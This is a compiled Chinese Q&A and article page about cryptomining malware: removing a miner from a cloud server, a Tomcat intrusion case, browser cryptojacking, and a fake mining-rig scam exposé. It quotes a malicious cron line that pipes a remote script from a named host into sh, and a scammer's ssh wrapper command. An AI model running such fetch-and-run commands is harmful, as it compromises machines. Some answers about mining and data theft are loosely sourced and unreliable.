三万网站正在被挖矿

Ⅰ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

Ⅱ 求助服务器被挖矿程序入侵，如何排查

新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

一切稳定运行，网站打开正常。

Ⅲ 手机被别人挖矿是什么意思

被挖矿是指浏览不良网站背后的黑客会通过程序窃取你的个人信息。
一旦出现这种情况，那么就说明你的个人信息肯定是已经泄露了，而一般的正规网站是不会泄露用户的个人信息，只有经常浏览一些钓鱼网站、盗版资源网站和不良网站，才会导致个人信息泄露。另外，申请好友的陌生人，基本都是一些带着“美女头像”，且备注的信息都充满诱导性，而目的就是为了让我们同意。

Ⅳ 从图片上看我是否正在挖矿，可为什么矿池网站无速度显示。已经过了50分钟了啊。

貌似没有挖矿，好像是设置出了问题。你在使用GPU挖矿，你挖的是比特币还是莱特币，也或者是其它山寨币。这个你可以联系一下矿池的客服，咨询一下他们，他们相对比较专业一点。如果你挖的是比特币的话，那你的挖矿设备有点太OUT了！如果挖的是莱特币，挖矿设备也谈不上先进。挖的是其它山寨币的话勉强还可以。给你几条建议：人如果挖的是比特币的建议使用阿瓦隆三代机器，如果是莱特币也建议你购买asic莱特币矿机，其它山寨币就无所谓了。

Ⅳ 被打电话通知手机被挖矿了是真的吗

被打电话通知手机被挖矿了是骗局。
上百万安卓手机被黑客劫持用来挖矿，这正是黑客通过恶意广告重定向骗局对数百万安卓手机所做的事，目前黑客使用的确切方法还并不完全清楚，但似乎是用户下载了遭感染的应用后，被迅速重定向到某一网站。该网站明确表明，它正在使用受感染的设备来挖掘加密货币，并且只会在用户输入有效的CAPTCHA代码时停止。

Ⅵ 最近听说进入不良网站，黑客会拿我们的手机挖矿啥的，自动弹出的不良网站我点进去一秒就退了，被挖矿吗

没有想的那么神奇。。现在的不良网站一般都是教人如何赌博。。如何打架什么的。通常会有赌博网站的连接在里面。。诱惑你去赌博的。。没有什么挖矿什么的。。退出去以后。重启下手机。。基本就正常了。。

Ⅶ 当你浏览不良网站的时候，黑客们在干什么

区块律动 BlockBeats 做了个统计，截至7月9号，全网有超过3万家网站内置了“挖矿”代码，只要用户打开网站进行浏览、操作，网站就会调用电脑或手机的计算资源，来进行“挖矿”。

如果你有浏览“黄色”网站的习惯，那你也应该注意一下，因为不少“黄色”网站未来增加收入也会加入“挖矿”代码，除了网站所有者自行添加“挖矿”代码之外，还有黑客黑入其他网站服务在代码中，恶意植入“挖矿”代码木马的情况。是不是很可怕呢？小伙伴们有没有遇到过手机莫名其妙发烫的现象呢？

Ⅷ 电脑怎样做才能防止植入挖矿程序呢

也不难的，安装了腾讯电脑管家已全面拦截这批包含挖矿程序的网站，还有就是不要随意打开来历不明的网址，同时保持安全软件的开启状态，及时拦截危险网页的恶意行为。据说以色情网站为首的数百个网站被植入挖矿程序，一旦点击访问，电脑将会被占用大量资源“帮助”不法分子挖掘门罗毕等虚拟货币，

Ⅸ 骗局揭秘：你的矿机真的在挖矿吗

最近，我收到一位朋友的咨询，让我发现了一种新型骗局。

之后的几天，我又发现有三位朋友中招，他们的被骗经历和骗子的手法极其相似,都是在某二手交易平台上购买矿机，都是正常挖矿一周后算力突然消失，很可能是同一伙骗子所为。

我想，我该做点儿什么了。

奇怪的故障

这天，某A向我咨询，他购买的20台显卡矿机，突然都不能挖矿了。

具体故障表现为：矿池显示矿机掉线。

▼由于长时间没有算力，某A向我咨询时，矿机已经显示为失效了。

帮助过颇多小白的我，还是有一定经验的，我让他用手感受下矿机出风口的温度。

▼这是正常挖矿的功耗

▼这是空载时的功耗

可以发现，矿机如果不在挖矿的话，显卡的功耗会明显降低，出风口应该基本感受不到温度。

某A很快给了我答复，出风口是热的，和之前没有区别。

显然，矿机是在工作的。

既然机器在工作，那就可以直接排除网络和矿池的原因。

因为如果和矿池的连接出了问题，挖矿软件会停止挖矿，显卡功耗也会降低。

似乎只有一个可能的解释：机器被黑了，算力被切到了别人的地址上。

既然是系统被黑了，保险起见，最好的办法就是重装一下。

经验告诉我，一个被黑的系统，重装是最省时省力的办法，鬼知道黑客会搞什么幺蛾子，矿机又没有数据要保留。

在我的指导下，某A成功安装minerOS，一个专为挖矿定制的系统。

之后，让我一脸懵逼的事儿来了，居然检测不到显卡！！

▼minerOS后台没有识别到任何显卡

一台能插8卡的矿机，主板一定会使用各种奇技淫巧来增加PCIE插槽。

常见的方法有：PCIE交换机、带宽降低到1x、协议使用PCIE 2.0等等，兼容性和稳定性确实一般，偶尔丢一两张卡是很常见的。

但是，能把8张卡都给丢了的，我真是第一次见到。

转机

某A和我折腾了好几个小时，一筹莫展。

就在我几乎打算放弃远程调试，打算让某A把机器寄给我时，某A抱怨了一句：热死了。

这句话点醒了我，我又让某A检查了下出风口的温度，依然是热的。

似乎机器还在挖矿，可是明明连显卡都识别不到。

索性直接让某A把矿机关机，但是依然保持电源打开，过了一会儿，某A检查出风口，居然还是热的。

这就有点儿奇怪了不是？

一不做二不休，不管机器上的防拆贴，我直接让某A找来螺丝刀，拆机。

这一拆不要紧，真是让人大吃一惊。

机器里只有一个小小的工控板，几根电热丝，一个小小的电源，还有一些砖头，机箱两侧是暴力风扇。

▼此处某A不同意使用他的矿机图片，请根据此示意图自行脑补画面。

不用说，某A被骗了。

不得不说，骗子的想象力还是很丰富的。

机箱里的砖头是配重用的，电热丝显然是用来产生热量，让你以为机器在工作。

工控板里刷个系统，再配个电源，齐活。

不解

某A认为他已经足够小心了，走的是二手交易平台，并且正常挖了一周才确认收货的。

很早以前就有一种骗局，骗你购买云算力或者所谓的“矿机”，其实根本就不能挖矿，只能连接骗子提供的所谓“矿池”，上面给你显示点儿算力，每天给你打点儿币，说是挖矿收益。

算力只是骗子搭建的网站上的数字，收益其实是骗子从你买云算力或者矿机的币中拿出一点儿转给你的。

等上当受骗的人足够多了，骗子就卷款跑路，这类骗局最著名的当属“蜗牛星际”。

其实这种骗局很容易识破，只要你要求必须能在第三方矿池挖矿，就可以了。

第三方矿池会公正地显示算力，显然这种骗局中并没有真实算力，因此可以识破。

某A是知道这种骗局的，因此他强调必须要在F2Pool能够显示算力，并且收益要是F2Pool支付的，这至少能保证算力是真实存在的。

经过我的检查，某A收到的收益，确确实实是从F2Pool的地址支付的，可以在链上查到，并且也能在F2Pool上查到相关挖矿记录。

所以，算力是真实存在的，如假包换。

但是，机箱里的这些东西，是不可能产生算力的，到底算力从何而来呢？

某A再三确认，这些机器收到后没有任何其他人碰过，不存在被调包的可能。

我决定仔细研究一番。

由于这台机器已经重装过系统，我让某A又找来另一台机器。

揭秘

经过一番排查，我还真找到了猫腻，不由让我赞叹，这骗子太聪明了。

▼这是常用的以太坊挖矿工具lolMiner是吧，我一开始也是这么认为的。

▼查看一下它的大小，居然只有48个字节，要知道正常的lolMiner的可执行文件应该在8MB左右。

▼查看下内容，这个lolMiner居然是个脚本。

大家是怎么启动挖矿的呢？使用这行命令对吧：

./lolMiner.exe --algo ETHASH --pool 矿池地址 --user 钱包地址.矿机名

因为这台机器上的lolMiner并不是真实的挖矿程序，而是个脚本，上面的命令行参数会补全到脚本里。

最终执行的其实是这个命令：

ssh [email protected] "~/lolminer/lolMiner" --algo ETHASH --pool 矿池地址 --user 钱包地址.矿机名

这个命令的功能是什么呢？

远程登录 http://xxx.xxx.xxx.xxx 这台机器，在远程的机器上执行挖矿程序lolMiner，并把程序的输出传输到本地显示，挖矿其实是在骗子手里的真矿机上进行的。

骗子还很贴心地配置了ssh私钥免密码登陆，真真正正地做到了与真实的lolMiner操作没有区别。

估计看到这里，没一定技术基础的朋友一定晕了，没关系，我们画张图，理顺下。

▼正常的挖矿

▼某A的“矿机”

看出区别了吗？

其实真正在挖矿的是骗子手里的真矿机，某A手里的假矿机只不过是给真矿机发了个指令，这也是为什么骗子手里的真矿机能知道某A的挖矿账号的原因。

骗子手里的那些真矿机会把挖矿日志传回来，显示在某A手里的假矿机上，看起来假矿机是在挖矿。

因为骗子手里的真矿机在某A的地址上挖矿，所以矿池有显示，并会支付收益。

因此，某A会以为手上的这台假矿机在挖矿。

沉甸甸的砖头做配重，风扇吹出热乎乎的风，配合上不断跳动的挖矿日志，如假包换的矿池算力显示，还有真金白银的收益，真是完美的骗局！

无奈

一句话，小白矿工，真的太苦了，才出虎穴又入狼窝。

如果说“假矿池”这种坑还可以躲避的话，小白很难避免受到这种“假矿机真算力”骗局的欺骗。

从某A发给我的聊天截图来看，骗子是那么的真诚，耐心指导，消息秒回。

骗子在某二手平台上的信用分也很高，销售矿机的价格又是那么的优惠，比行情价低了两千多。

机器到手后，上面都是防拆贴，你拆了，人家名正言顺地说是你调包，不退不换。

今天是砖头，也许拆了能看出来，明天要是换成报废的显卡呢？你从外观真看不出来。

今天这个脚本只有几十KB，如果下次人家编译一个大小差不多的二进制文件呢？

除了逆向工程，否则你真没办法知道这个程序是不是真的在用你的矿机挖矿，显然不是小白的能力范围。

就算你刷了自己的系统，人家一句只兼容提供的系统，你也没话说。

毕竟，矿机配置千奇百怪，系统不兼容需要额外调试也是很正常的。

你只有10天时间，只要忽悠你10天，钱就到骗子手里了，人家可以直接关了真矿机跑路。

卖给某A矿机的这个骗子，现在就已经消失了，消息不回，电话不接，连地址都是假的。

启示

在这个浮躁的环境下，所有人都幻想着一夜暴富，骗子利用的正是这点。

当你觉得有利可图的时候，请务必问自己三个问题：

你赚的钱是哪里来的？

你相比于其他人，有什么优势，为什么是你赚别人的钱而不是反过来？

你真的了解你所投资的东西吗？

如果某A不是过于自信，而是更多地了解一下矿圈，或者在大量拿货之前，先拿一两台试试，又或者是找一个第三方来检查下矿机，是不是就不会被骗了呢？

很多朋友加我的微信第一句话：李老师有没有什么群可以让我学习一下？

这让我想起了我小时候，练习题买了一大堆，似乎买了你就会了，就能考高分了。

加一大堆乱七八糟的群，真的有用吗？

我们生活在一个信息过载的时代，你需要做的是从海量的垃圾信息中，寻找真实和有用的信息，而不是浸泡在更多垃圾信息里幻想自己也是牛人。

有巨大价值的信息，会出现在几百人个陌生人组成的群里吗？

就算是一个本来有价值的信息，出现在这种群里之后，还有价值吗？

商业的本质就是信息差，众所周知周知的信息，哪里还有信息差可言？哪里还有价值呢？

更别说群里各种骗局横生，某A就是在群里结识的骗子，继而被骗的。

从某A的被骗，有感而发，不知不觉又写了好几千字。

骗局还在继续，如果你也是骗局的受害者，请分享你的经历，避免更多人受害。

Ⅹ 天下没有免费的午餐，当你浏览违规网站时，实际上是帮别人挖矿

随着互联网 科技 的高速发展，智能手机基本贯穿了人们的生活，这也使得人们的生活方式朝着更有效、更方便的方向发展。 然而，互联网的普及一直是利弊相同的，虽然互联网对用户来说更方便，但或多或少都有一定的风险。

以浏览一些不 健康 的网站为例，在绝大多数人的意识中，悄悄浏览不 健康 的网站是不为人所知的，顶多有时候手机会被病毒入侵。

像有时候网页上会突然跳出提醒你手机正在遭受病毒攻击的页面，然后让你下载杀毒的软件，实际上，这个杀毒的软件就是病毒。当然，对于有经验的人来说，这也见怪不怪了，早就习以为常，更何况处理这样的页面，有着多种方法。

除了这点以外，事实上，违规网站通常存在窃取用户个人信息的行为，如果被意图不好的人使用，必然会对用户的财产安全构成威胁。毕竟，所有电信诈骗的源头通常都是个人隐私被泄露，所以当你浏览页面时，可能页面幕后的“黑客”正在狂笑不止。

当然，个人信息泄露只是一方面，其实当你浏览不 健康 网站时，实际上是在帮他人挖矿。我们都知道，大部分互联网公司都是靠广告流量来达到盈利的目的，这意味着运营需要维护网站的广告流量需求。

特别是一些单纯依靠广告谋生的网站，如果你想获得更多的收入，那么你需要打开另一捷径。因此，在这种背景下，一些站点就将目光放在了虚拟货币上。

据相关统计显示，目前有2% 的网站依靠用户来挖矿，以此赚取虚拟货币。 对于普通人来说，这可能是一项艰巨的任务，可对于网站来说，它只需要在网页上嵌入一串虚拟货币的代码就可将其完成。 用户只需打开页面浏览，代码就会自动扫描你的手机或电脑。

据不完全统计，目前已有数亿台设备用于挖矿，其中大部分被成人站点利用。因此，当用户浏览不 健康 的网站时，该设备可能就会被黑客用来挖矿，当该设备具有较高的负载率时，它将会出现发热甚至卡顿的情况，因此大家最好不要浏览不 健康 的网站。

在一般情况下，用户浏览网页的时间并不长，所谓日积月累，随着时间的推移，网站也会积累大量的数据和利益。

据估计，如果一个页面一天有20人浏览并点击广告，网站将会获得200元左右，那么一个月下来，收入也算是比较可观。可是大家想一想，这还只是20人，要是人数较多，那么可以想象会有多么大的金额产出。

如果你担心在浏览网页时被别人利用，那么也可以用一些插件来阻拦，当然，最好的方法自然是不浏览，毕竟插件也不是好获得的。

说到底，天下没有免费的午餐，当你浏览不 健康 的网站时，它背后的黑客会通过网络程序窃取你的个人信息，或者利用你的设备挖矿，最终使设备报废。

大家是如何认为的呢？ 喜欢润界本地化，请多多关注！